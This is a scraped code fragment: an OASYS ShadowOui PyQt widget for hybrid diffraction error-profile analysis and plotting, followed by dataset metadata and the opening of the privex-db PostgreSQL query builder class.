congruence.checkPositiveNumber(self.ghy_distance, "Distance to image value")
if self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_x, "Number of bins for I(Sagittal) histogram")
if self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_z, "Number of bins for I(Tangential) histogram")
if self.ghy_files is None or len(self.ghy_files) == 0 or (len(self.ghy_files) == 1 and self.ghy_files[0] == ""):
raise ValueError("Height Error Profiles list is empty")
congruence.checkStrictlyPositiveNumber(self.ghy_npeak, "Number of diffraction peaks")
congruence.checkStrictlyPositiveNumber(self.ghy_fftnpts, "Number of points for FFT")
def set_progress_bar(self, value):
if value >= 100:
self.progressBarFinished()
elif value <=0:
self.progressBarInit()
else:
self.progressBarSet(value)
def status_message(self, message):
self.setStatusMessage(message)
def write_stdout(self, text):
cursor = self.shadow_output.textCursor()
cursor.movePosition(QTextCursor.End)
cursor.insertText(text)
self.shadow_output.setTextCursor(cursor)
self.shadow_output.ensureCursorVisible()
def setPreProcessorData(self, data):
if data is not None:
if data.error_profile_data_file != ShadowPreProcessorData.NONE:
if isinstance(data.error_profile_data_file, str):
self.ghy_files.append(data.error_profile_data_file)
elif isinstance(data.error_profile_data_file, list):
self.ghy_files = data.error_profile_data_file
else:
raise ValueError("Error Profile Data File: format not recognized")
self.refresh_files_text_area()
def refresh_files_text_area(self):
text = ""
for file in self.ghy_files:
text += file + "\n"
self.files_area.setText(text)
def export_error_analysis(self):
output_folder = QFileDialog.getExistingDirectory(self, "Select Output Directory", directory=os.curdir)
if output_folder:
if not self.current_histo_data_x_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_ff,
stats=self.current_stats_x_ff,
suffix="_S_FF",
output_folder=output_folder)
if not self.current_histo_data_x_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_nf,
stats=self.current_stats_x_nf,
suffix="_S_NF",
output_folder=output_folder)
if not self.current_histo_data_z_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_ff,
stats=self.current_stats_z_ff,
suffix="_T_FF",
output_folder=output_folder)
if not self.current_histo_data_z_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_nf.bins,
stats=self.current_stats_z_nf,
suffix="_T_NF",
output_folder=output_folder)
QMessageBox.information(self, "Export Error Analysis Data", "Data saved into directory: " + output_folder, QMessageBox.Ok)
| 49.628014 | 174 | 0.556933 |
ontal")
self.le_nbins_z = oasysgui.lineEdit(box_2, self, "ghy_nbins_z", "Number of bins for I(Tangential) histogram", labelWidth=260, valueType=int, orientation="horizontal")
self.le_npeak = oasysgui.lineEdit(box_2, self, "ghy_npeak", "Number of diffraction peaks", labelWidth=260, valueType=int, orientation="horizontal")
self.le_fftnpts = oasysgui.lineEdit(box_2, self, "ghy_fftnpts", "Number of points for FFT", labelWidth=260, valueType=int, orientation="horizontal")
box_3 = oasysgui.widgetBox(tab_adv, "Propagation Parameters", addSpace=True, orientation="vertical", height=200)
self.cb_focal_length_calc = gui.comboBox(box_3, self, "focal_length_calc", label="Focal Length", labelWidth=180,
items=["Use O.E. Focal Distance", "Specify Value"],
callback=self.set_FocalLengthCalc,
sendSelectedValue=False, orientation="horizontal")
self.le_focal_length = oasysgui.lineEdit(box_3, self, "ghy_focallength", "Focal Length value", labelWidth=260, valueType=float, orientation="horizontal")
gui.separator(box_3)
self.cb_distance_to_image_calc = gui.comboBox(box_3, self, "distance_to_image_calc", label="Distance to image", labelWidth=150,
items=["Use O.E. Image Plane Distance", "Specify Value"],
callback=self.set_DistanceToImageCalc,
sendSelectedValue=False, orientation="horizontal")
self.le_distance_to_image = oasysgui.lineEdit(box_3, self, "ghy_distance", "Distance to Image value", labelWidth=260, valueType=float, orientation="horizontal")
gui.separator(box_3)
self.cb_nf = gui.comboBox(box_3, self, "ghy_nf", label="Near Field Calculation", labelWidth=310,
items=["No", "Yes"],
sendSelectedValue=False, orientation="horizontal", callback=self.set_NF)
box_4 = oasysgui.widgetBox(tab_adv, "Geometrical Parameters", addSpace=True, orientation="vertical", height=70)
gui.comboBox(box_4, self, "ghy_automatic", label="Analize geometry to avoid unuseful calculations", labelWidth=310,
items=["No", "Yes"],
sendSelectedValue=False, orientation="horizontal")
box_5 = oasysgui.widgetBox(tab_adv, "Plot Setting", addSpace=True, orientation="vertical", height=150)
gui.comboBox(box_5, self, "plot_type", label="Plot Type", labelWidth=310,
items=["2D", "3D"],
sendSelectedValue=False, orientation="horizontal", callback=self.set_PlotType)
self.box_pt_1 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
self.box_pt_2 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
gui.comboBox(self.box_pt_2, self, "plot_type_3D", label="3D Plot Aspect", labelWidth=310,
items=["Lines", "Surface"],
sendSelectedValue=False, orientation="horizontal")
self.set_DiffPlane()
self.set_DistanceToImageCalc()
self.set_CalculationType()
self.set_NF()
self.set_PlotType()
self.initializeTabs()
adv_other_box = oasysgui.widgetBox(tab_bas, "Export Data", addSpace=False, orientation="vertical")
gui.button(adv_other_box, self, "Export Error Analysis", callback=self.export_error_analysis)
self.shadow_output = oasysgui.textArea(height=580, width=800)
out_box = gui.widgetBox(out_tab, "System Output", addSpace=True, orientation="horizontal")
out_box.layout().addWidget(self.shadow_output)
def after_change_workspace_units(self):
label = self.le_focal_length.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
label = self.le_distance_to_image.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
def select_files(self):
files, _ = QFileDialog.getOpenFileNames(self,
"Select Height Error Profiles", "","Data Files (*.dat);;Sha Files (*.sha)",
options=QFileDialog.Options())
if files:
self.ghy_files = files
self.refresh_files_text_area()
def initializeTabs(self):
self.tabs.clear()
tabs = []
if self.ghy_diff_plane < 2:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")]]
if self.ghy_nf == 1:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field")))
self.tab.append([gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")])
elif self.ghy_diff_plane >= 2:
if self.ghy_nf == 1:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (T)")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
[gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")],
[gui.createTabPage(tabs[2], "Position"), gui.createTabPage(tabs[2], "Stats")],
[gui.createTabPage(tabs[3], "Position"), gui.createTabPage(tabs[3], "Stats")]
]
else:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
[gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")]
]
for tab in tabs:
tab.setFixedHeight(self.IMAGE_HEIGHT)
tab.setFixedWidth(self.IMAGE_WIDTH)
self.plot_canvas = [None, None, None, None]
self.plot_canvas_stats = [None, None, None, None]
def plot_emtpy(self, progressBarValue, plot_canvas_index):
if self.plot_canvas[plot_canvas_index] is None:
widget = QWidget()
widget.setLayout(QHBoxLayout())
label = QLabel(widget)
label.setPixmap(QPixmap(QImage(os.path.join(resources.package_dirname("orangecontrib.shadow.widgets.extension"), "icons", "no_result.png"))))
widget.layout().addWidget(label)
self.plot_canvas[plot_canvas_index] = widget
self.tab[plot_canvas_index].layout().addWidget(self.plot_canvas[plot_canvas_index])
self.progressBarSet(progressBarValue)
def setBeam(self, beam):
if ShadowCongruence.checkEmptyBeam(beam):
if ShadowCongruence.checkGoodBeam(beam):
self.input_beam = beam
if self.is_automatic_run:
self.run_hybrid()
def set_PlotType(self):
self.plot_canvas = [None, None, None, None]
self.box_pt_1.setVisible(self.plot_type==0)
self.box_pt_2.setVisible(self.plot_type==1)
def set_DiffPlane(self):
self.le_nbins_x.setEnabled(self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2)
self.le_nbins_z.setEnabled(self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2)
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_CalculationType(self):
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_NF(self):
if self.ghy_nf == 0:
self.focal_length_calc = 0
self.distance_to_image_calc = 0
self.cb_focal_length_calc.setEnabled(False)
self.le_focal_length.setEnabled(False)
else:
self.cb_focal_length_calc.setEnabled(True)
self.le_focal_length.setEnabled(True)
self.set_FocalLengthCalc()
def set_FocalLengthCalc(self):
self.le_focal_length.setEnabled(self.focal_length_calc == 1)
def set_DistanceToImageCalc(self):
self.le_distance_to_image.setEnabled(self.distance_to_image_calc == 1)
def run_hybrid(self):
try:
self.setStatusMessage("")
self.progressBarInit()
self.initializeTabs()
if ShadowCongruence.checkEmptyBeam(self.input_beam):
if ShadowCongruence.checkGoodBeam(self.input_beam):
sys.stdout = EmittingStream(textWritten=self.write_stdout)
self.check_fields()
input_parameters = hybrid_control.HybridInputParameters()
input_parameters.ghy_lengthunit = self.workspace_units
input_parameters.widget = self
input_parameters.ghy_diff_plane = self.ghy_diff_plane + 1
if self.distance_to_image_calc == 0:
input_parameters.ghy_distance = -1
else:
input_parameters.ghy_distance = self.ghy_distance
if self.focal_length_calc == 0:
input_parameters.ghy_focallength = -1
else:
input_parameters.ghy_focallength = self.ghy_focallength
input_parameters.ghy_nf = self.ghy_nf
input_parameters.ghy_nbins_x = int(self.ghy_nbins_x)
input_parameters.ghy_nbins_z = int(self.ghy_nbins_z)
input_parameters.ghy_npeak = int(self.ghy_npeak)
input_parameters.ghy_fftnpts = int(self.ghy_fftnpts)
input_parameters.file_to_write_out = self.file_to_write_out
input_parameters.ghy_automatic = self.ghy_automatic
shadow_beam = self.input_beam.duplicate()
history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
shadow_oe = history_entry._shadow_oe_start
shadow_oe._oe.F_RIPPLE = 0
input_parameters.ghy_calcType = 2
input_parameters.shadow_beam = shadow_beam
calculation_parameters = hybrid_control.hy_run(input_parameters)
self.ghy_focallength = input_parameters.ghy_focallength
self.ghy_distance = input_parameters.ghy_distance
self.ghy_nbins_x = int(input_parameters.ghy_nbins_x)
self.ghy_nbins_z = int(input_parameters.ghy_nbins_z)
self.ghy_npeak = int(input_parameters.ghy_npeak)
self.ghy_fftnpts = int(input_parameters.ghy_fftnpts)
if input_parameters.ghy_calcType == 3 or input_parameters.ghy_calcType == 4:
do_plot_x = True
do_plot_z = True
else:
if self.ghy_automatic == 1:
do_plot_x = not calculation_parameters.beam_not_cut_in_x
do_plot_z = not calculation_parameters.beam_not_cut_in_z
else:
do_plot_x = True
do_plot_z = True
do_nf = input_parameters.ghy_nf == 1 and input_parameters.ghy_calcType > 1
if do_plot_x or do_plot_z:
self.setStatusMessage("Plotting Results")
profile = 0
self.current_histo_data_x_ff = None
self.current_histo_data_x_nf = None
self.current_histo_data_z_ff = None
self.current_histo_data_z_nf = None
self.current_stats_x_ff = None
self.current_stats_x_nf = None
self.current_stats_z_ff = None
self.current_stats_z_nf = None
histo_data_x_ff, \
histo_data_z_ff, \
histo_data_x_nf, \
histo_data_z_nf = self.plot_results(calculation_parameters=calculation_parameters,
do_nf=do_nf,
do_plot_x=do_plot_x,
do_plot_z=do_plot_z,
histo_data_x_ff=HistogramData(),
histo_data_z_ff=HistogramData(),
histo_data_x_nf=HistogramData(),
histo_data_z_nf=HistogramData(),
profile=profile)
if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff = HistogramDataCollection(histo_data_x_ff)
if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff = HistogramDataCollection(histo_data_z_ff)
if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf = HistogramDataCollection(histo_data_x_nf)
if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf = HistogramDataCollection(histo_data_z_nf)
stats_x_ff = StatisticalDataCollection(histo_data_x_ff)
stats_z_ff = StatisticalDataCollection(histo_data_z_ff)
stats_x_nf = StatisticalDataCollection(histo_data_x_nf)
stats_z_nf = StatisticalDataCollection(histo_data_z_nf)
input_parameters.ghy_calcType = self.ghy_calcType + 3
for file in self.ghy_files:
shadow_beam = self.input_beam.duplicate()
history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
shadow_oe = history_entry._shadow_oe_start
shadow_oe._oe.F_RIPPLE = 1
shadow_oe._oe.F_G_S = 2
file = congruence.checkFile(file)
ShadowCongruence.checkErrorProfileFile(file)
shadow_oe._oe.FILE_RIP = bytes(file, 'utf-8')
input_parameters.shadow_beam = shadow_beam
calculation_parameters = hybrid_control.hy_run(input_parameters)
if do_plot_x or do_plot_z:
self.setStatusMessage("Plotting Results")
profile += 1
histo_data_x_ff, \
histo_data_z_ff, \
histo_data_x_nf, \
histo_data_z_nf = self.plot_results(calculation_parameters,
do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_z_ff,
histo_data_x_nf,
histo_data_z_nf,
profile)
if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff.add_histogram_data(histo_data_x_ff)
if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff.add_histogram_data(histo_data_z_ff)
if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf.add_histogram_data(histo_data_x_nf)
if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf.add_histogram_data(histo_data_z_nf)
stats_x_ff.add_statistical_data(histo_data_x_ff)
stats_z_ff.add_statistical_data(histo_data_z_ff)
stats_x_nf.add_statistical_data(histo_data_x_nf)
stats_z_nf.add_statistical_data(histo_data_z_nf)
self.current_stats_x_ff = stats_x_ff
self.current_stats_z_ff = stats_z_ff
self.current_stats_x_nf = stats_x_nf
self.current_stats_z_nf = stats_z_nf
self.add_empty_curves(do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_x_nf,
histo_data_z_ff,
histo_data_z_nf)
self.plot_stats(do_nf,
do_plot_x,
do_plot_z,
stats_x_ff,
stats_z_ff,
stats_x_nf,
stats_z_nf,)
else:
raise Exception("Input Beam with no good rays")
else:
raise Exception("Empty Input Beam")
except Exception as exception:
QMessageBox.critical(self, "Error", str(exception), QMessageBox.Ok)
if self.IS_DEVELOP: raise exception
self.setStatusMessage("")
self.progressBarFinished()
def plot_results(self,
calculation_parameters,
do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_z_ff,
histo_data_x_nf,
histo_data_z_nf,
profile):
if self.ghy_diff_plane == 0:
if do_plot_x:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=1, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
else:
if do_nf:
self.plot_emtpy(88, 0)
self.plot_emtpy(96, 1)
else:
self.plot_emtpy(88, 0)
elif self.ghy_diff_plane == 1:
if do_plot_z:
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=0, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
self.plot_emtpy(88, 0)
if do_nf:
self.plot_emtpy(96, 1)
elif self.ghy_diff_plane >= 2:
if do_plot_x and do_plot_z:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=2, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=3, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
if do_plot_x:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=1, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
elif do_plot_z:
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=0, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
self.plot_emtpy(88, 0)
if do_nf:
self.plot_emtpy(96, 1)
return histo_data_x_ff, histo_data_z_ff, histo_data_x_nf, histo_data_z_nf
def add_empty_curves(self, do_nf, do_plot_x, do_plot_z, histo_data_x_ff, histo_data_x_nf, histo_data_z_ff,
histo_data_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_canvas_stats[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x and do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
self.plot_canvas[1].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[2].add_empty_curve(histo_data_x_nf)
self.plot_canvas[3].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
def plot_stats(self, do_nf, do_plot_x, do_plot_z, stats_x_ff, stats_z_ff, stats_x_nf, stats_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
else:
if do_plot_x and do_plot_z:
self.plot_stat(stats_x_ff, 0)
self.plot_stat(stats_z_ff, 1)
if do_nf:
self.plot_stat(stats_x_nf, 2)
self.plot_stat(stats_z_nf, 3)
else:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
def plot_stat(self, stats, plot_canvas_index, sigma_um="$\mu$m"):
if self.plot_canvas_stats[plot_canvas_index] is None:
self.plot_canvas_stats[plot_canvas_index] = DoublePlotWidget(parent=None)
self.tab[plot_canvas_index][1].layout().addWidget(self.plot_canvas_stats[plot_canvas_index])
self.plot_canvas_stats[plot_canvas_index].plotCurves(stats.get_scan_values(),
stats.get_sigmas(),
stats.get_relative_peak_intensities(),
"Statistics",
"Profiles",
"Sigma [" + sigma_um + "]",
"Relative Peak Intensity")
def plot_histo(self, beam, col, nbins=100, progressBarValue=80, plot_canvas_index=0, title="", xtitle="", ytitle="",
profile=1, offset=0.0, xrange=None):
if self.plot_canvas[plot_canvas_index] is None:
if self.plot_type == 0:
self.plot_canvas[plot_canvas_index] = ScanHistoWidget(self.workspace_units_to_cm)
elif self.plot_type==1:
self.plot_canvas[plot_canvas_index] = Scan3DHistoWidget(self.workspace_units_to_cm,
type=Scan3DHistoWidget.PlotType.LINES if self.plot_type_3D==0 else Scan3DHistoWidget.PlotType.SURFACE)
self.tab[plot_canvas_index][0].layout().addWidget(self.plot_canvas[plot_canvas_index])
histo_data = self.plot_canvas[plot_canvas_index].plot_histo(beam=beam,
col=col,
nbins=nbins,
title=title,
xtitle=xtitle,
ytitle=ytitle,
histo_index=profile,
scan_variable_name="Profile #",
scan_variable_value=profile,
offset=offset,
xrange=xrange)
histo_data.scan_value=profile
self.progressBarSet(progressBarValue)
return histo_data
def check_fields(self):
if self.focal_length_calc == 1:
congruence.checkPositiveNumber(self.ghy_focallength, "Focal Length value")
if self.distance_to_image_calc == 1:
congruence.checkPositiveNumber(self.ghy_distance, "Distance to image value")
if self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_x, "Number of bins for I(Sagittal) histogram")
if self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2:
congruence.checkStrictlyPositiveNumber(self.ghy_nbins_z, "Number of bins for I(Tangential) histogram")
if self.ghy_files is None or len(self.ghy_files) == 0 or (len(self.ghy_files) == 1 and self.ghy_files[0] == ""):
raise ValueError("Height Error Profiles list is empty")
congruence.checkStrictlyPositiveNumber(self.ghy_npeak, "Number of diffraction peaks")
congruence.checkStrictlyPositiveNumber(self.ghy_fftnpts, "Number of points for FFT")
def set_progress_bar(self, value):
if value >= 100:
self.progressBarFinished()
elif value <=0:
self.progressBarInit()
else:
self.progressBarSet(value)
def status_message(self, message):
self.setStatusMessage(message)
def write_stdout(self, text):
cursor = self.shadow_output.textCursor()
cursor.movePosition(QTextCursor.End)
cursor.insertText(text)
self.shadow_output.setTextCursor(cursor)
self.shadow_output.ensureCursorVisible()
def setPreProcessorData(self, data):
if data is not None:
if data.error_profile_data_file != ShadowPreProcessorData.NONE:
if isinstance(data.error_profile_data_file, str):
self.ghy_files.append(data.error_profile_data_file)
elif isinstance(data.error_profile_data_file, list):
self.ghy_files = data.error_profile_data_file
else:
raise ValueError("Error Profile Data File: format not recognized")
self.refresh_files_text_area()
def refresh_files_text_area(self):
text = ""
for file in self.ghy_files:
text += file + "\n"
self.files_area.setText(text)
def export_error_analysis(self):
output_folder = QFileDialog.getExistingDirectory(self, "Select Output Directory", directory=os.curdir)
if output_folder:
if not self.current_histo_data_x_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_ff,
stats=self.current_stats_x_ff,
suffix="_S_FF",
output_folder=output_folder)
if not self.current_histo_data_x_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_x_nf,
stats=self.current_stats_x_nf,
suffix="_S_NF",
output_folder=output_folder)
if not self.current_histo_data_z_ff is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_ff,
stats=self.current_stats_z_ff,
suffix="_T_FF",
output_folder=output_folder)
if not self.current_histo_data_z_nf is None:
write_histo_and_stats_file(histo_data=self.current_histo_data_z_nf.bins,
stats=self.current_stats_z_nf,
suffix="_T_NF",
output_folder=output_folder)
QMessageBox.information(self, "Export Error Analysis Data", "Data saved into directory: " + output_folder, QMessageBox.Ok)
| true | true |
1c3c89eef599aed04fda4f871c9ab8f8c5f9eedc | 8,653 | py | Python | privex/db/query/postgres.py | Privex/python-db | 3b46b34b4310973e2e2a30a66adaa853fd10340d | [
"X11"
] | 1 | 2019-12-19T13:12:53.000Z | 2019-12-19T13:12:53.000Z | privex/db/query/postgres.py | Privex/python-db | 3b46b34b4310973e2e2a30a66adaa853fd10340d | [
"X11"
] | 9 | 2020-02-24T20:14:53.000Z | 2021-04-30T21:51:04.000Z | privex/db/query/postgres.py | Privex/python-db | 3b46b34b4310973e2e2a30a66adaa853fd10340d | [
"X11"
] | null | null | null | from typing import Iterable, Union
import psycopg2.extras
import psycopg2.extensions
import logging
from privex.db.base import CursorManager
from privex.db.types import GenericCursor
from privex.db.query.base import BaseQueryBuilder, QueryMode
log = logging.getLogger(__name__)
class PostgresQueryBuilder(BaseQueryBuilder):
"""
A simple SQL query builder / ORM, designed for use with PostgreSQL. May or may not work with other RDBMS's.
Basic Usage:
First, inject your psycopg2 connection into QueryBuilder, so it's available to all instances.
>>> PostgresQueryBuilder.conn = psycopg2.connect(user='bob', dbname='my_db')
Now, just construct the class, passing the table name to query.
>>> q = PostgresQueryBuilder('orders')
You can execute each query building method either on their own line, and/or you can chain them together.
**WARNING:** many methods such as :py:meth:`.select` do not escape your input. Only :py:meth:`.where` and
:py:meth:`.where_or` use prepared statements, with a placeholder for the value you pass.
>>> q.select('full_name', 'address')
>>> q.select('SUM(order_amt) as total_spend').where('country', 'FR') \
... .where('SUM(order_amt)', '100', compare='>=')
>>> q.group_by('full_name', 'address')
Once you've finished building your query, simply call either :py:meth:`.all` (return all results as a list)
or :py:meth:`.fetch` (returns the first result, or ``None`` if there's no match)
>>> results = q.order('full_name', direction='ASC').all()
>>> print(results[0])
Output::
dict{'full_name': 'Aaron Doe', 'address': '123 Fake St.', 'total_spend': 127.88}
You can call :py:meth:`.build_query` to see the query that would be sent to PostgreSQL, showing the
value placeholders (e.g. %s)
>>> print(q.build_query())
Output::
SELECT full_name, address, SUM(order_amt) as total_spend FROM orders WHERE country = %s
AND SUM(order_amt) >= %s GROUP BY full_name, address ORDER BY full_name ASC;
Copyright::
+===================================================+
| © 2019 Privex Inc. |
| https://www.privex.io |
+===================================================+
| |
| Privex Database Library |
| |
| Core Developer(s): |
| |
| (+) Chris (@someguy123) [Privex] |
| |
+===================================================+
"""
Q_PRE_QUERY = "set timezone to 'UTC'; "
Q_DEFAULT_PLACEHOLDER = "%s"
cursor_cls: psycopg2.extensions.cursor
query_mode: QueryMode
@property
def conn(self) -> psycopg2.extensions.connection:
return self.connection
def __init__(self, table: str, connection=None, **kwargs):
super().__init__(table, connection)
self.query_mode = query_mode = kwargs.pop('query_mode', QueryMode.ROW_DICT)
if query_mode == QueryMode.ROW_DICT:
cursor_cls = psycopg2.extras.RealDictCursor
elif query_mode == QueryMode.ROW_TUPLE:
cursor_cls = psycopg2.extras.NamedTupleCursor
else:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
self.cursor_cls = kwargs.pop('cursor_cls', cursor_cls)
self._cursor_map = {
QueryMode.DEFAULT: self.cursor_cls,
QueryMode.ROW_DICT: psycopg2.extras.RealDictCursor,
QueryMode.ROW_TUPLE: psycopg2.extras.NamedTupleCursor
}
def fetch_next(self, query_mode=QueryMode.ROW_DICT) -> Union[dict, tuple, None]:
if not self._is_executed:
self.execute()
return self.cursor.fetchone()
def query_mode_cursor(self, query_mode: QueryMode, replace_cursor=True, cursor_mgr=True):
"""
Return a cursor object with the cursor class based on the ``query_mode``, using the
query_mode to cursor class map in :py:attr:`._cursor_map`
:param QueryMode query_mode: The QueryMode to obtain a cursor for
:param bool replace_cursor: (Default: ``True``) If True, replace the shared instance :py:attr:`._cursor` with
this new cursor.
:param bool cursor_mgr: Wrap the cursor object in :class:`.CursorManager`
:return:
"""
_cur = self.get_cursor(cursor_class=self._cursor_map[query_mode])
if cursor_mgr:
_cur = CursorManager(_cur, close_callback=self._close_callback)
if replace_cursor:
try:
self.close_cursor()
except (BaseException, Exception):
pass
self._cursor = _cur
return _cur
def build_query(self) -> str:
return self._build_query()
def get_cursor(self, cursor_name=None, cursor_class=None, *args, **kwargs) -> psycopg2.extensions.cursor:
"""Create and return a new Postgres cursor object"""
cur_cls = self.cursor_cls if cursor_class is None else cursor_class
if cursor_name is not None:
